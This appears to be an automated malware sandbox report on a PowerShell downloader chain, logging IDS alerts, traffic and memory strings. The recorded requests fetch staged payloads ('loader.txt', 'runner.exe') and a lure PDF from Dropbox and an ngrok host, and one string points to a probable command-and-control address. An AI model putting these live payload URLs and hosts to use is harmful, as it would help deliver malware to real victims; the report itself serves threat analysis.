Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49795 -> 162.125.65.18:443
Source: global traffic, HTTP traffic detected:
    GET /api/secure/fc08667ad2d7db61431b61a30eb0ffa8 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: www.dropbox.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /scl/fi/0hdi5yqluk704whzcrld6/loader.txt?rlkey=b3m23z6tgb7mwwfbcjqi9kumq&dl=1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: www.dropbox.com
Source: global traffic, HTTP traffic detected:
    GET /cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy1EbV_kkFt7x7pNv4EGcAcGs9ubYKnueanAgdrt18MpOGLByYptKhrOTVO8_-MDxUmiJFR7DlQRry8QaYCflUDCMGIFKMn6OimPUeMReCMy9lrgaEsqLezrEWxuZ7/file?dl=1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
    Host: www.dropbox.com
    Connection: keep-alive
    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic, HTTP traffic detected:
    GET /cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=1 HTTP/1.1
    Host: uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic, HTTP traffic detected:
    GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
    Host: clients2.googleusercontent.com
    Connection: keep-alive
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic, HTTP traffic detected:
    GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: www.dropbox.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb8rqKQvyuiDbpB-VdYP-6ND-6fxABcXlB3tMWgAdfASpXTaeR__Vb9ARDsyMetchbpNKDnaLRETh-2t55upVh299KdSqt_bR33vpX5w1Yp9d5_2bhsHbCKA9YhGbE/file?dl=1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
    Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | HTTP traffic detected: GET /api/secure/fc08667ad2d7db61431b61a30eb0ffa8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app | Connection: Keep-Alive
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com 
https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ 
https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src 
https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
Source: global traffic; DNS traffic detected: DNS query: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
Source: global traffic; DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic; DNS traffic detected: DNS query: uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
Source: global traffic; DNS traffic detected: DNS query: ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
Source: global traffic; DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic; DNS traffic detected: DNS query: uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com
Source: global traffic; DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic; DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic; DNS traffic detected: DNS query: uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
Source: global traffic; DNS traffic detected: DNS query: uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
Source: unknown; HTTP traffic detected: POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
Source: svchost.exe, 00000006.00000002.3285480575.0000018A79400000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://edge-block-www-env.dropbox-dns.com
Source: svchost.exe, 00000006.00000003.2227435676.0000018A791C0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.2324544978.000001BD8477C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://go.micros
Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2324544978.000001BD83FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B0005E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www-env.dropbox-dns.com
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.dropbox.com
Source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp; String found in binary or memory: http://www.glarysoft.com/goto.php?a=upgradetopro&s=DiskDefrag340100134010023401003340100434010053401
Source: powershell.exe, 00000002.00000002.2393157557.000001BD9C41B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000010.00000002.2521531111.0000028B71FE1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.coX
Source: powershell.exe, 00000002.00000002.2393157557.000001BD9C41B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.oA
Source: powershell.exe, 00000002.00000002.2389901126.000001BD9C366000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://.AppV.
Source: fontdrvhost.exe; String found in binary or memory: https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65ge
Source: fontdrvhost.exe, 00000019.00000002.2755189242.0000000002DDC000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gex
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
Source: powershell.exe, 00000002.00000002.2324544978.000001BD83FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324302969.000001BD83AF0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8
Source: powershell.exe, 00000002.00000002.2323457545.000001BD8206C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324302969.000001BD83AF0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8-UseBa
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://a.sprig.com/
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/gsi/client
Source: powershell.exe, 00000002.00000002.2324544978.000001BD83FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B0005E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000002.00000002.2324544978.000001BD85F6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD85F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD85450000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.login.yahoo.com/
